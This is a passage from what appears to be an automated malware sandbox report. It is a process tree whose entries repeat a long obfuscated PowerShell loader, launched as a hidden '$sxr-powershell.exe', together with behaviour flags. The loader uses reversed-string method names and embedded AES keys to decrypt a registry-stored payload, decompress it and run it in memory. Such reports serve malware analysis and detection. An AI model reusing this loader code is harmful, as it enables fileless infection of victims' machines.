[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:5308
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4424).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Checks computer location settings
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5468
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5468).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:5184
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5468).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:5412
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5468).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = 